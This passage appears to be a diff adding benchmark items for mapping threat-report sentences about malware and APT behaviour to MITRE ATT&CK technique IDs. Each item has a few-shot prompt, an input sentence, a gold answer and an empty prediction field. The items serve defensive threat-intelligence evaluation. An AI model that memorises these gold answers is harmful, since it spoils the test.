collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.\n\t - T1025: Data from Removable Media\n\t - T1543: Create or Modify System Process\n\t - T1005: Data from Local System\n\t - T1091: Replication Through Removable Media\n- Text: Clambling has the ability to capture and store clipboard data.\n\t - T1115: Clipboard Data\n", + "input": "Explosive has collected the username from the infected host.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Shamoon can download an executable to run on the victim.\n\t - T1105: Ingress Tool Transfer\n- Text: The stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n", + "input": "ShadowPad has downloaded code from a C2 server.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Additionally malware reports itself to its hardcoded command and control servers and established a backdoor connection, so the attacker may have a permanent remote connection\n\t - T1008: Fallback Channels\n", + "input": "APT29 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.", + "gold": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: For Operation Sharpshooter, the threat actors used the ExpressVPN service to hide their location.\n\t - T1090: Proxy\n- Text: can sleep for a specific time and be set to communicate at specific intervals.\n\t - T1029: Scheduled Transfer\n- Text: Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.\n\t - T1030: Data Transfer Size Limits\n", + "input": "Kessel can use a proxy during exfiltration if set in the configuration.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The payload of is encrypted with simple XOR with a rotating key. The configuration file has been encrypted with RC4 keys.\n\t - T1027: Obfuscated Files or Information\n- Text: Rocke has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n- Text: has been packed with the UPX packer.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n", + "input": "HyperBro can be delivered encrypted to a compromised host.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Communication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain - C2 traffic encrypted with RSA-2048 - Custom AES-encrypted storage format used to store configuration, plugins, and harvested data - Unique version number for each sample\n\t - T1071.004: Application Layer Protocol - DNS\n\t - T1027: Obfuscated Files or Information\n- Text: GrimAgent can base64 encode C2 replies.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: uses a backup communication method with an HTTP beacon.\n\t - T1008: Fallback Channels\n", + "input": "QUADAGENT uses DNS for C2 communications.", + "gold": "- T1071.004: Application Layer Protocol - DNS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT3 places scripts in the startup folder for persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: may store RC4 encrypted configuration information in the Windows Registry.\n\t - T1112: Modify Registry\n- Text: Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer. Analysts can easily extract detailed information from these trees, such as the implant DLL dropped by the installer, the command used to call rundll32.exe and load the DLL, and the registry modifications that set the DLL as a service\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "DarkComet adds several Registry entries to enable automatic execution at every system startup.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sidewinder has used VBScript to drop and execute malware loaders.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Then the article describes how, since the beginning of 2019, the group has been leveraging self-extracting archives to run code\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n\t - T1027: Obfuscated Files or Information\n- Text: LockBit 2.0 is typically executed via command line arguments via a hidden window.Windows SysInternals PsExec has been utilized for both persistence and execution purposes. Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities. \n\t - T1059: Command and Scripting Interpreter\n", + "input": "APT32 has used macros, COM scriptlets, and VBS scripts.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ebury v1.4 has a fallback mechanism whereby a domain generation algorithm (DGA) is used when the attacker doesn\u2019t connect to the infected system via the OpenSSH backdoor for three days. Under these conditions, Ebury will exfiltrate the collected data using the generated domain. Ebury v1.6 has the same mechanism, but there is a minor change to the DGA itself\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n\t - T1008: Fallback Channels\n- Text: Lazarus Group has used multiple proxies to obfuscate network traffic from victims.\n\t - T1090.002: Proxy - External Proxy\n- Text: The Winnti for Windows HTTP/S C2 mode can make use of a local proxy.\n\t - T1090.001: Proxy - Internal Proxy\n", + "input": "JHUHUGIT tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.", + "gold": "- T1008: Fallback Channels", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Amongst the downloaded files, the fake .gif and .jpg files appear to be dependencies for the malware\n\t - T1083: File and Directory Discovery\n\t - T1105: Ingress Tool Transfer\n- Text: Clambling has the ability to enumerate network shares.\n\t - T1135: Network Share Discovery\n- Text: The discovery modules used with Duqu can collect information on open windows.\n\t - T1010: Application Window Discovery\n", + "input": "WINERACK can enumerate files and directories.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware contains 1 function, the purpose is to open the drive of the infected system (\\\\.\\PhysicalDrive0) and write the following data to the MBR: You can see the \"Are you Happy. After writing to the MBR, the malware reboots the machine with the following command: c:\\windows\\system32\\shutdown /r /t 1 After the reboot, the MBR displays the following string to the user: The link to the other campaigns was the following PDB path\n\t - T1529: System Shutdown/Reboot\n- Text: WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload.\n\t - T1106: Native API\n- Text: CVE-2022-42821 allows hackers to bypass Gatekeeper by setting restrictive Access Control Lists (ACLs) using specially-crafted payloads that prohibit Safari, web downloaders or any other program through which an app is downloaded from setting com.apple.quarantine attribute to the downloaded file/application/software.\n\t - T1553.001: Subvert Trust Controls - Gatekeeper Bypass\n", + "input": "WhisperGate can shutdown a compromised host through execution of `ExitWindowsEx` with the `EXW_SHUTDOWN` flag.", + "gold": "- T1529: System Shutdown/Reboot", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 exploited a Windows SMB Remote Code Execution Vulnerability to conduct lateral movement.\n\t - T1210: Exploitation of Remote Services\n- Text: Carberp has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.\n\t - T1068: Exploitation for Privilege Escalation\n- Text: Ember Bear has exploited Microsoft Office vulnerability CVE-2017-11882.\n\t - T1203: Exploitation for Client Execution\n", + "input": "menuPass has used tools to exploit the ZeroLogon vulnerability (CVE-2020-1472).", + "gold": "- T1210: Exploitation of Remote Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: regsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry. The script attempts to load the malicious module using regsvr with the run function. Procmon shows the malicious module loaded to the Avast process\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n- Text: Upon execution, MCMD spawns a console process (cmd.exe) with redirected standard input and output (I/O) handles. Immediately after execution, the window properties of both the MCMD and cmd.exe processes are modified to prevent them from being visible on the active user's desktop. MCMD utilizes the shared I/O handles to send and receive data between the C2 server and the command shell (see Figure 1\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: APT29 has used WinRM via PowerShell to execute command and payloads on remote hosts.\n\t - T1021.006: Remote Services - Windows Remote Management\n", + "input": "Squirrelwaffle has used PowerShell to execute its payload.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server. It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor\u2019s note: AC is not a DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain): A AAAA AC \u2013 (see note above) CNAME MX TXT SRV SOA The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2\n\t - T1123: Audio Capture\n\t - T1071: Application Layer Protocol\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1008: Fallback Channels\n- Text: CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment\n\t - T1090: Proxy\n\t - T1021.004: Remote Services - SSH\n\t - T1572: Protocol Tunneling\n- Text: POWRUNER can use DNS for C2 communications.\n\t - T1071.004: Application Layer Protocol - DNS\n", + "input": "OilRig malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP.", + "gold": "- T1008: Fallback Channels", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task.\n\t - T1072: Software Deployment Tools\n- Text: Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.\n\t - T1133: External Remote Services\n- Text: The screen capture below shows the decryption function.It then calls the StartAndPatchRegAsm function.This function tries to find the original Microsoft RegAsm executable path\n\t - T1113: Screen Capture\n", + "input": "GOLD SOUTHFIELD has used the cloud-based remote management and monitoring tool \"ConnectWise Control\" to deploy REvil.", + "gold": "- T1219: Remote Access Software", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Raspberry Robin leverages rundll32.exe followed by shell32.dll and calls the ShellExec_RunDLL or ShellExec_RunDLLA functions to execute the DLL via the processes such as odbcconf.exe, msiexec.exe and control.exe.\n\t - T1218.008: System Binary Proxy Execution - Odbcconf\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: After the system reboots, the file \u201cAJWrDz.exe\u201d executes, which in turn triggers the side-loading of the malicious (and fake) DLL file \u201cdbghelp.dll\u201d. This malicious DLL file injects itself to Windows Media Player process \u2014 wmplayer.exe, and reflectively loads the renamed jesus.dmp file, \u201cAJWrDz.dmp\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Some Orz versions have an embedded DLL known as MockDll that uses Process Hollowing and regsvr32 to execute another payload.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n", + "input": "During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FELIXROOT adds a shortcut file to the startup folder for persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. The 64kb lnk file is downloader code\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n", + "input": "Carberp has maintained persistence by placing itself inside the current user's startup folder.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LAPSUS$ has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval.\n\t - T1621: Multi-Factor Authentication Request Generation\n- Text: After loading its configuration data, GoldMax checks the current date-time value of the compromised system against the activation date from the configuration data\n\t - T1016: System Network Configuration Discovery\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n\t - T1124: System Time Discovery\n- Text: BadPatch attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "Bazar can attempt to overload sandbox analysis by sending 1550 calls to \"printf\".", + "gold": "- T1497: Virtualization/Sandbox Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At the beginning of October 2021, Proofpoint researchers identified public samples of Gamaredon RTF template injection documents which impersonated the Ukrainian Ministry of Defense. This tactic is consistent with reporting on this APT group that links Gamaredon to the Russian FSB operating in the Republic of Crimea and the city of Sevastopol. The files communicate with the domain pretence77.glorious[.]nonima[.]ru which also was a remote template delivery URL used by several Microsoft Office Word documents that impersonated Ukrainian government organizations. These Office files communicate with actor infrastructure using a URI pattern previously observed among Gamaredon malicious Microsoft Office phishing documents. Specifically, the Microsoft Office documents used remote template injection to retrieve malicious payload files using URIs with the directory \u201c/ELENAPC/principles/\u201d on several occasions. Additionally, in several instances the resources retrieved delivered an MP3 file as a delivery resource\n\t - T1221: Template Injection\n- Text: On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. The primary difference was that this sample was encrypted and password protected, requiring the victim to enter in a password which was likely provided by the adversary to view the document. Typically, password protected documents is commonly used by adversaries as an evasion tactic to bypass automated analysis mechanisms due to the password requirement for successful execution. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time\n\t - T1204.002: User Execution - Malicious File\n- Text: Confucius has sent malicious links to victims through email campaigns.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Confucius has lured victims into clicking on a malicious link sent through spearphishing.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Unlike previous RDAT samples, this particular sample only uses DNS tunneling for its C2 communications with no HTTP fallback channel. This RDAT sample can only use TXT queries in its DNS tunnel and will issue queries structured like the following\n\t - T1071.004: Application Layer Protocol - DNS\n\t - T1008: Fallback Channels\n- Text: There are multiple ways for the operators to reach a Kobalos-infected machine. The method we\u2019ve seen the most is where Kobalos is embedded in the OpenSSH server executable (sshd) and will trigger the backdoor code if the connection is coming from a specific TCP source port. These variants either connect to a C&C server that will act as a middleman, or wait for an inbound connection on a given TCP port\n\t - T1205: Traffic Signaling\n- Text: No matching sample found for T1499.001\n", + "input": "The Penquin C2 mechanism is based on TCP and UDP packets.", + "gold": "- T1095: Non-Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attempt to get detailed information about the operating system and hardware, such as version, patches, hotfixes, service packs, and architecture (System Information Discovery [T1082]) - Enumerate files and directories or search in specific locations of a host or network share for particular information within a file system (File and Directory Discovery [T1083]) - Get a list of security software, configurations, defensive tools, and sensors installed on the system (Software Discovery: Security Software Discovery [T1518.001]) - Procure information about running processes on a system to understand standard software running on network systems (Process Discovery [T1057]) - Identify primary users, currently logged in users, sets of users that commonly use a system, or active or inactive users (System Owner/User Discovery [T1033]) - Enumerate browser bookmarks to learn more about compromised hosts, reveal personal information about users, and expose details about internal network resources (Browser Bookmark Discovery [T1217]) - Look for information on network configuration and system settings on compromised systems, or perform remote system discovery (System Network Configuration Discovery [T1016]) - Interact with the Windows Registry to gather information about the system, configuration, and installed software (Query Registry [T1012]) - Get a list of open application windows to learn how the system is used or give context to data collected (Application Window Discovery [T1010]) - Attempt to get a listing of local system or domain accounts in the compromised system (Account Discovery [T1087]) - Obtain a list of network connections to and from the compromised system or remote system by querying for information over the network (System Network Connections Discovery [T1049\n\t - T1083: File and Directory Discovery\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1033: System Owner/User Discovery\n\t - T1082: System Information Discovery\n\t - T1217: Browser Information Discovery\n- Text: ShadowPad has deleted arbitrary Registry values.\n\t - T1070: Indicator Removal\n- Text: TeamTNT has cleared command history with \"history -c\".\n\t - T1070.003: Indicator Removal - Clear Command History\n", + "input": "DarkWatchman can retrieve browser history.", + "gold": "- T1217: Browser Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as \u201chacked,\" \"phish,\" and \u201cmalware\" in a likely attempt to prevent organizations from communicating about their activities.\n\t - T1564.008: Hide Artifacts - Email Hiding Rules\n- Text: Lizar can collect email accounts from Microsoft Outlook and Mozilla Thunderbird.\n\t - T1087.003: Account Discovery - Email Account\n", + "input": "CreepyDrive can use Powershell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: achieves persistence by creating a Registry entry in HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Volgmer stores the encoded configuration file in the Registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security\".\n\t - T1112: Modify Registry\n- Text: Kazuar adds a .lnk file to the Windows startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n", + "input": "TURNEDUP is capable of writing to a Registry Run key to establish.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This script is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate). The same can be found in Pony 1.9 code\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Winnti for Windows can delete the DLLs for its various components from a compromised host.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: CrackMapExec can execute remote commands using Windows Management Instrumentation.\n\t - T1047: Windows Management Instrumentation\n", + "input": "Lazarus Group malware uses cmd.exe to execute commands on a compromised host. A Destover-like variant used by Lazarus Group uses a batch file mechanism to delete its binaries from the system.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. 